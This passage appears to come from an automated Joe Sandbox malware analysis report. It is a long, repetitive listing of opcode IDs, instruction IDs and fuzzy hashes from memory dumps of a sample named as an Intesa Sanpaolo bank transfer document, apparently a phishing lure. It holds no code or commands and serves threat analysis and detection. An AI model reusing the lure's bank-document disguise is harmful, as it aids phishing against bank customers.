                                  • Opcode Fuzzy Hash: 077a97ff666e394c8c84e95912cafc6079d5bfdcab4485760f0ed4f243a6c20b
                                  • Instruction Fuzzy Hash: 5D21E9B1E01209ABCB14DFAAD9909EEFBF9FF98B10F10012EE515A7250D7709941CB54
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction ID: 3085576bed3125985f2d21acec13a3689547ad79389268e80ccbca8bdf34bd87
                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction Fuzzy Hash: 88218C72A00209EFDF169F99CC80BAEBBB9EF88310F214419F960A7251D734D9509B50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction ID: 5c3695b2a5c3d2ea004d913a34d2337dd362e3d4b15c76ba14c67bd69b442481
                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction Fuzzy Hash: F411EF72640605AFE7229B48CC82FDABBB9EB80754F10406DFB448B580D671ED44CB60
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cee7e4eea0f077ca9ff79b198ca526c1ae5316f479653d852491ce7e458c526a
                                  • Instruction ID: d16af9972b8db01f79c5c16950e6b0e8909f7c5d998afbcdfa116b6522d3f7d5
                                  • Opcode Fuzzy Hash: cee7e4eea0f077ca9ff79b198ca526c1ae5316f479653d852491ce7e458c526a
                                  • Instruction Fuzzy Hash: AE1193357006119FDB55CF4DC4C0A5EBBE5BF56B10B1881AEEE489F204E6B2D901CB94
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction ID: 5d3f76459771b7126c7d6f0b754804caed7df4157e630e50eb6b10303779ba98
                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction Fuzzy Hash: EB21AC71B00609DFD7259F49C541A66BBE6EF94B10F14887DEA898BA1AC730EC00CB40
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecdae61ee07d87901ca4c439c5f7addaf3b607c5327a301a7d4e73e9dc29e8c9
                                  • Instruction ID: 332776c5a5bff876155382ae8520d9edc1786fad6aecfc9b291faac8c167c027
                                  • Opcode Fuzzy Hash: ecdae61ee07d87901ca4c439c5f7addaf3b607c5327a301a7d4e73e9dc29e8c9
                                  • Instruction Fuzzy Hash: 5F215E75A00205DFCB14CF58C591AAEBBF9FB88714F2481AED545AB351C771AD06CF90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c4d1f5df4f2a3bc06d9e1b04a679b3f17a7d8f852681ccf8966542231af57bd
                                  • Instruction ID: 45c9a124a172a79779ef25ba2fe51799ca8179a039d86f152b58ad24da4e7d13
                                  • Opcode Fuzzy Hash: 7c4d1f5df4f2a3bc06d9e1b04a679b3f17a7d8f852681ccf8966542231af57bd
                                  • Instruction Fuzzy Hash: 7D218E75500B00EFD7249F68C881B6AB7F8FF84350F00882DE69AC7A50DB71A840CBA0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b3c4947a2fe6d09d298a461cd36336618c3ac248b432c67007a8ea415abf031
                                  • Instruction ID: b277003eb527fd8e71ce2e4ae4e14c8abac174a8f1e91bcfe8ebb8cf43e6293c
                                  • Opcode Fuzzy Hash: 6b3c4947a2fe6d09d298a461cd36336618c3ac248b432c67007a8ea415abf031
                                  • Instruction Fuzzy Hash: 4E11C172240605EFC76ADB69CD40F9A77B8EB59760F414025FA619B260EB70E901C7D0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc0a575eec7a646243bf9b8f56a3d450bb66b4481c1eb0b3769116607ff7a31f
                                  • Instruction ID: 706a4f8324bc0284a93b8c0456cf0aaf71f811b7ef768164ea70cb2f1dd58dd2
                                  • Opcode Fuzzy Hash: dc0a575eec7a646243bf9b8f56a3d450bb66b4481c1eb0b3769116607ff7a31f
                                  • Instruction Fuzzy Hash: C61108733001199FCB1DDB29CD85AAF72E7EBE5270F358529D922DB290EA309812C390
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e561b12d55e01121453db25f72307622c325a2311e1ff9b419c7cf98ff21006e
                                  • Instruction ID: c6b3672e157b771a99c54f37a268924193b025ca1831d785a094f923512ccdcc
                                  • Opcode Fuzzy Hash: e561b12d55e01121453db25f72307622c325a2311e1ff9b419c7cf98ff21006e
                                  • Instruction Fuzzy Hash: 2011CE76A01305EFCB29CF59C582A5ABBF8AF94610B0140BDDA859B711E630DD00CBA0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction Fuzzy Hash: 59F01D7220011DBFEF019F95DD80DEF7BBEEB596A8B104125FA1196160D731DD21EBA0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 330eb9ad3af8190d00aa640127cfec9b254cfa789689b93362db6a4f7ca0c522
                                  • Instruction ID: f92b9561aa21be911a23688ba8c3c3c58dc4b44419a2a65608f0adb90ca8d7b2
                                  • Opcode Fuzzy Hash: 330eb9ad3af8190d00aa640127cfec9b254cfa789689b93362db6a4f7ca0c522
                                  • Instruction Fuzzy Hash: 5F018936100109ABCF169F84E940EDE3F66FF4C664F068111FE196A220C332D971EF81
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 344fc9e0f40109c715e77e1b07b0710bba9e3afa910d370399a73248c04dbc55
                                  • Instruction ID: 749eab630fbee3b47bac0e70b42798d1682b3dca59270fa90401930cd9829cda
                                  • Opcode Fuzzy Hash: 344fc9e0f40109c715e77e1b07b0710bba9e3afa910d370399a73248c04dbc55
                                  • Instruction Fuzzy Hash: 2CF08B322002415BF7949208CD51BA232D5E7D1650F288469E7849F2C0E9B0CC018794
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5894004b77460ceb52c65737aeba62ea9f5a621cc1d880b9d5bd042b897b4283
                                  • Instruction ID: 920b35945aca78a97dce75edcc261b7d29d0877f1190a98582c49fd440419d52
                                  • Opcode Fuzzy Hash: 5894004b77460ceb52c65737aeba62ea9f5a621cc1d880b9d5bd042b897b4283
                                  • Instruction Fuzzy Hash: EB01A470204B819BE36BA73CDD4DF6937E4BB40F04F480694BB41DBED6D769D4418615
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction ID: 7e16f2fbc15599124a24385ea26509b9deada3c7c1abeb36d9a99cde8790acfa
                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction Fuzzy Hash: 9CF02E35349E3347EB3DAA2F8810B2FBA9E9F90E00B05052C9A41CBE80DF21DC10C780
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction ID: fec19b6754fbad92517ac60733ce38e236eea0b787031e98cd260bc77a154162
                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction Fuzzy Hash: 9AF05E727526139BFB299B4EDC80F16B7A8BFD5E60F1A0065A6049F260C764EC0187D0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 242af102fcd14d0db775b5e49cc0cb47fdfd3924d5bf7098dab7579b2b88af1e
                                  • Instruction ID: df39dfd5a02c2119fd30e321fc3773b366900fb2affd6b1fd7103b1b3d8bc3ad
                                  • Opcode Fuzzy Hash: 242af102fcd14d0db775b5e49cc0cb47fdfd3924d5bf7098dab7579b2b88af1e
                                  • Instruction Fuzzy Hash: D6F0AF70A1A3059FD318EF28C541A1BB7E4FF98714F40465AB898DB394E734EA00CB96
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction ID: 67083210e652bc064779d67e72a0ec2bd96048f624c0c0ef7c33cb3fda3c8848
                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction Fuzzy Hash: D4F02472600200AFE314DB21CC01F86B6EAEF98300F148078AAC4C7164FBB4DD01C654
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 323bdb14caa356250c560a6a216ba57723e8ad1f6cf2337db73e11070b898428
                                  • Instruction ID: ea8f231fe76bba5a8b1eb26a0582145f180aa10023100d8b783c9d307f7ebb99
                                  • Opcode Fuzzy Hash: 323bdb14caa356250c560a6a216ba57723e8ad1f6cf2337db73e11070b898428
                                  • Instruction Fuzzy Hash: E1F0BB325012449BD62E6B5CD8C4B9EBF6EFB94B10F094469FA992711187306C81C790
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a4b18b94a5a35dc9188e5bb3dbe868f66ac61f299a62b7135bf9f5df3c1a43b
                                  • Instruction ID: c61278eab3a6c4451ec4a0239bf52c4c9e4c486fb7e3459312d7b545dbf3270e
                                  • Opcode Fuzzy Hash: 0a4b18b94a5a35dc9188e5bb3dbe868f66ac61f299a62b7135bf9f5df3c1a43b
                                  • Instruction Fuzzy Hash: B7F0AF74A02209AFCB08EF69C551B9EB7B4FF18300F008065A955EB385EA74EA01CB94
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a651a25a5cd40548a8b973052a3e596a154138e3785ba130e629346a26cae70
                                  • Instruction ID: 07962cd6854ac5ec4a710f63408ee5a7527125848bce4dd684b181d60bf46a28
                                  • Opcode Fuzzy Hash: 1a651a25a5cd40548a8b973052a3e596a154138e3785ba130e629346a26cae70
                                  • Instruction Fuzzy Hash: B1F0F0319122E58EE7728F1CC034B2F7BC4BB00E20F0888AED5C9C3522C724D888CE10
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8272032ab4f869fbb759104e1e219b05fccaefd50e0379042c3f623906690a2d
                                  • Instruction ID: 6f19b045fa4d2a13de06970a7f44788dd649ff1759716bde5b6efaa264d835e2
                                  • Opcode Fuzzy Hash: 8272032ab4f869fbb759104e1e219b05fccaefd50e0379042c3f623906690a2d
                                  • Instruction Fuzzy Hash: D4F027264156890ADF3E7B2C78D02D13B65A769124F095055E4B067209C774C8C7CB20
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12e408d3feab76e3b61f2db1930c5956edb8f719adc42dbb7b9f2442472a9b1c
                                  • Instruction ID: 6587e49b594246c33a893a5dabf3bc9220b086792e09bb634c4b05dcd88bc9f6
                                  • Opcode Fuzzy Hash: 12e408d3feab76e3b61f2db1930c5956edb8f719adc42dbb7b9f2442472a9b1c
                                  • Instruction Fuzzy Hash: A4F02E715192999BF7A2861CC30BF517BD49B0CAA0F0894AAC6C283E02C220E880CA40
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction ID: 0acfc53c912cf14002daf3734cd8d0227d91f9d6413e993497ac8d213598d12c
                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction Fuzzy Hash: 85E0D8327006012BE726AE598CC4F47776EDFD6B14F040079B9045F292CAE2DC0982A4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction ID: 7e13863c1fb5a9bb1f7f7b2ed3e69d90327c4805dbb6055050ec1a3941993d74
                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction Fuzzy Hash: 75F06572104204DFE3699F09DD44F52B7F8EB05365F96C025EA199B561D379EC40CBE4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction ID: 71c38bb5e2c70cad8ba72231e833f752fa5950e5fabe420773ca333050730ff8
                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction Fuzzy Hash: B9F0A039605341DBDB1ADF19D040AE97BA4FB41750B040058FC828B311D731E981DF55
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction ID: 0ad6f01f5fabb5719ca8e5d9930f512ed81b2ed22c03920639902e83956d6eaa
                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction Fuzzy Hash: F1E0D832244645ABD3212A5D8802B6B7BE5DBD47A0F15042DEB80CB950DB74DC44C7D8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction ID: 8330ba5906736a318c4f11fe2eb193b2ab123727316e8ec86173ecaa95ca33ce
                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction Fuzzy Hash: E9E0DF32A00610BFDB25A7998D01FDBBEBCDB94FA0F050054BA00E71D4E630DE00D690
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                  • Instruction ID: 680a4650c292ef5062814784e9150072f8fdc3bcf498c1505d1f29020ff502f6
                                  • Opcode Fuzzy Hash: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                  • Instruction Fuzzy Hash: BCE09272100A549BC326BB29DD15FCA779AEB64764F014529F15597190CB34A850CB94
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction ID: 477a968a0da935ae8058236d77ef6dba0ccd5d185319ad2db0faab5b993d2083
                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction Fuzzy Hash: 4BD09235612E80CFD65ACB0CC5A4B2533E4BB84A44F8104E0E445CBB26D628E950CA00
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction ID: 86681701bcd605a77b2211518c4e26e24b2716146c1f228a5ed19d26b17d9425
                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction Fuzzy Hash: 9EC01232290648AFC712AB99CD01F427BA9EBA8B40F000021F2048B670C631E820EA84
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction ID: bff56f7bca8b667f83ac3c5607c5b5f703418733df1e7d047e24966c02f4e3fe
                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction Fuzzy Hash: 89D01236200248EFCB01DF51C890D9A776AFBD8710F108019FD19076118A75ED62DA50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction ID: a11dfc0a2422f5e358c61ebe76d35e60960afd63835eed4e6c5757aba4b4de2c
                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction Fuzzy Hash: C6C04C797016428FCF16DB5DD694F4577E4F744740F150890E845CB721E724E801CA11
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                  • Instruction ID: 4a8e756debd19aec5e2cec7661c933f06e68ba7a04c1400247d3915b6bcc3fa9
                                  • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                  • Instruction Fuzzy Hash: 65B01232212545DFC7026721CB04B5832EDBF017C0F0900F465408D830D6188910E501
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                  • Instruction ID: 6ec35449439df6366f94fec8566b0ee965970dc0b6282e12473d8c69a02d0df5
                                  • Opcode Fuzzy Hash: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                  • Instruction Fuzzy Hash: 0E900232645800139144715859845469005A7E1301B55C021E0425554CCB148A565361
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                  • Instruction ID: 82ccc2b3fa0c1030cfe64393dba005efcba6c4be80408e0bc750da9cd9f3b995
                                  • Opcode Fuzzy Hash: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                  • Instruction Fuzzy Hash: 3F90026264150043414471585904406B005A7E2301395C125A0555560CC71889559369
                                  Memory Dump Source
